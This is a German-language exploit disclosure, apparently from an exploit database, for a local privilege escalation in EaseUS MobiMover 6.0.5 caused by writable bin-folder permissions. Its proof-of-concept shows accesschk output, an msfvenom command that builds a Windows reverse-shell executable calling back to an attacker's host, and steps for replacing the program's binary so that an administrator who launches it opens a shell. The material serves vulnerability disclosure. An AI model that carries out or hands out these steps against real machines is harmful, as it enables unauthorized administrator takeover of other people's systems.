
EaseUS MobiMover 6.0.5 Build 21620 - Unsichere Datei- und Ordnerberechtigungen
MobiMoverUILaunch.exe leidet unter einer Schwachstelle zur Erhöhung von Berechtigungen, die von einem "Authentifizierten Benutzer" genutzt werden kann, um die ausführbare Datei des Dienstes durch eine Binärdatei seiner Wahl im bin-Ordner zu ersetzen. Die Schwachstelle besteht aufgrund schwacher Berechtigungen, die der "Gruppe authentifizierter Benutzer" gewährt werden, was die (M)-Flagge, auch bekannt als "Modify Privilege", verleiht.

Hersteller-Webseite: https://www.easeus.com/
Software-Link: https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
POC-Video: https://www.youtube.com/watch?v=FR4cQm-z4Gw
#PoC
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
Erstellen Sie eine schädliche Binärdatei auf Kali Linux mit msfvenom
msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe
Übertragen Sie die erstellte 'prepare.exe' als Benutzer mit niedrigen Berechtigungen vom Kali auf den Windows-Host
Verschieben Sie die erstellte Binärdatei 'prepare.exe' in das Verzeichnis 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe', um die alte Datei als Benutzer mit niedrigen Berechtigungen zu ersetzen
Wenn der Administrator die Anwendung ausführt, erhalten Sie eine Reverse-Shell als Administrator